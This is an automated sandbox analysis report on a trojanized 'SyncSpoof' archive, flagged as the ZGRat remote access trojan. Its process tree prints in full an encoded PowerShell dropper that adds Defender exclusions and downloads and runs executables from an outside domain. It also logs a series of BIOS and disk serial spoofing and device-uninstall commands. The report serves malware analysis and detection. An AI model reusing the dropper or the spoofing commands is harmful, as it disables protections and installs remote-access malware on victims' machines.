Analysis

  • max time kernel
    30s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    13-05-2024 23:18

General

  • Target

    SyncSpoof Updated.rar

  • Size

    2.3MB

  • MD5

    bd5cd88a5053dda595098ce1f96d0288

  • SHA1

    537c6b3476b2f9f29f325123c8f1a31daae561fc

  • SHA256

    9a88596ac17ead66f77f50ff112c5a7d6def53fb92e218471ec41edaebf5b14b

  • SHA512

    e4bb01d9e1298aef964caf369609951d3039f25f899fe69ce949917b85895b39f97497608f10d697188caed8041a6f098bd396cd4737cc61943e4dde81cf4e49

  • SSDEEP

    49152:kNVfHPuWMR4aY6JnmGkbBX4A61bqLop/myP9KJhZA4FIJWhAjB7d1NgpdecPGN:kbf2WSYimhBIt9qLoBuU4cWhKdrgpdeJ

Malware Config

Signatures

  • Detect ZGRat V1 4 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 6 IoCs
  • Enumerates connected drives 3 TTPs 14 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 14 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 52 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\SyncSpoof Updated.rar"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SyncSpoof Updated.rar"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Users\Admin\AppData\Local\Temp\7zO0C9721B6\SyncSpoofer.exe
        "C:\Users\Admin\AppData\Local\Temp\7zO0C9721B6\SyncSpoofer.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYgBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZgBoAGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZwBsAHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBnAHUAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBpAHMAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHEAeQB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAZQBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHoAagBuACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG0AYQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBhAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgB4AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAeABzAGgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGQAcwBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBhAHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBxAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwByAGwAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBnAHoAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdQBrAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAHMAaABkACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdgBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAGwAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAawBuAGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaAB3AHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAegB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAHMAZgBoACMAPgA="
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2528
          • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
            "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: BU1N-003V
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: BU1N-003V
                7⤵
                • Executes dropped EXE
                PID:1636
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1832
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
                7⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1032
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
                7⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Maps connected drives based on registry
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3016
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1152
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
                7⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1244
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
                7⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Maps connected drives based on registry
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1264
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
                7⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Maps connected drives based on registry
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1564
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
                7⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1732
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
                7⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Maps connected drives based on registry
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1508
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1492
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
                7⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Maps connected drives based on registry
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1304
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
                7⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1200
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
                7⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Maps connected drives based on registry
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1476
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
                7⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Maps connected drives based on registry
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:960
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
                7⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1560
              • C:\ProgramData\Microsoft\Windows\DevManView.exe
                C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
                7⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2796
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
              6⤵
                PID:1536
                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 24500HP-TRGT9645AB
                  7⤵
                    PID:2252
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                  6⤵
                    PID:2924
                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 224500HP-TRGT9645RV
                      7⤵
                        PID:3040
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                      6⤵
                        PID:2512
                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 824503HP-TRGT20394SG
                          7⤵
                            PID:548
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                          6⤵
                            PID:1100
                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                              7⤵
                                PID:852
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                              6⤵
                                PID:2752
                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 524503HP-TRGT20394SL
                                  7⤵
                                    PID:872
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                  6⤵
                                    PID:2148
                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 424503HP-TRGT20394FA
                                      7⤵
                                        PID:2652
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                      6⤵
                                        PID:2548
                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 624503HP-TRGT20394FU
                                          7⤵
                                            PID:2608
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                          6⤵
                                            PID:3064
                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 324503HP-TRGT20394DQ
                                              7⤵
                                                PID:2456
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                              6⤵
                                                PID:2724
                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 724503HP-TRGT20394MST
                                                  7⤵
                                                    PID:1280
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                  6⤵
                                                    PID:3024
                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                      7⤵
                                                        PID:2836
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                                                      6⤵
                                                        PID:2608
                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 24523HP-TRGT19348AB
                                                          7⤵
                                                            PID:1904
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                                          6⤵
                                                            PID:2732
                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 224523HP-TRGT19348RV
                                                              7⤵
                                                                PID:1248
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                                              6⤵
                                                                PID:2520
                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 824523HP-TRGT19348SG
                                                                  7⤵
                                                                    PID:1972
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                                  6⤵
                                                                    PID:2724
                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                                      7⤵
                                                                        PID:1668
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                                                      6⤵
                                                                        PID:3024
                                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 524523HP-TRGT19348SL
                                                                          7⤵
                                                                            PID:2688
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                                                          6⤵
                                                                            PID:2028
                                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 424523HP-TRGT19348FA
                                                                              7⤵
                                                                                PID:1164
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                                                              6⤵
                                                                                PID:328
                                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 624523HP-TRGT19348FU
                                                                                  7⤵
                                                                                    PID:2164
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                                                                  6⤵
                                                                                    PID:556
                                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 324523HP-TRGT19348DQ
                                                                                      7⤵
                                                                                        PID:2852
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                                                      6⤵
                                                                                        PID:2572
                                                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 724523HP-TRGT19348MST
                                                                                          7⤵
                                                                                            PID:2324
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                                          6⤵
                                                                                            PID:2596
                                                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                                              7⤵
                                                                                                PID:1644
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                                                                                              6⤵
                                                                                                PID:808
                                                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 24539HP-TRGT7554AB
                                                                                                  7⤵
                                                                                                    PID:2864
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                                                                                  6⤵
                                                                                                    PID:1688
                                                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 224539HP-TRGT7554RV
                                                                                                      7⤵
                                                                                                        PID:1196
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                                                                                      6⤵
                                                                                                        PID:2736
                                                                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 824539HP-TRGT7554SG
                                                                                                          7⤵
                                                                                                            PID:2448
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                                                                          6⤵
                                                                                                            PID:1492
                                                                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                                                                              7⤵
                                                                                                                PID:2512
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                                                                                              6⤵
                                                                                                                PID:2812
                                                                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 524539HP-TRGT7554SL
                                                                                                                  7⤵
                                                                                                                    PID:2008
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                                                                                                  6⤵
                                                                                                                    PID:1072
                                                                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 424542HP-TRGT18303FA
                                                                                                                      7⤵
                                                                                                                        PID:2952
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                                                                                                      6⤵
                                                                                                                        PID:1628
                                                                                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 624539HP-TRGT7554FU
                                                                                                                          7⤵
                                                                                                                            PID:2384
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                                                                                                          6⤵
                                                                                                                            PID:2220
                                                                                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 324539HP-TRGT7554DQ
                                                                                                                              7⤵
                                                                                                                                PID:1756
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                                                                                              6⤵
                                                                                                                                PID:2640
                                                                                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 724539HP-TRGT7554MST
                                                                                                                                  7⤵
                                                                                                                                    PID:1652
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                                                                                  6⤵
                                                                                                                                    PID:108
                                                                                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                                                                                      7⤵
                                                                                                                                        PID:2652
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: BKE9-P6NH
                                                                                                                                      6⤵
                                                                                                                                        PID:1844
                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: BKE9-P6NH
                                                                                                                                          7⤵
                                                                                                                                            PID:2548
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: IRUR-ZC3E
                                                                                                                                          6⤵
                                                                                                                                            PID:2588
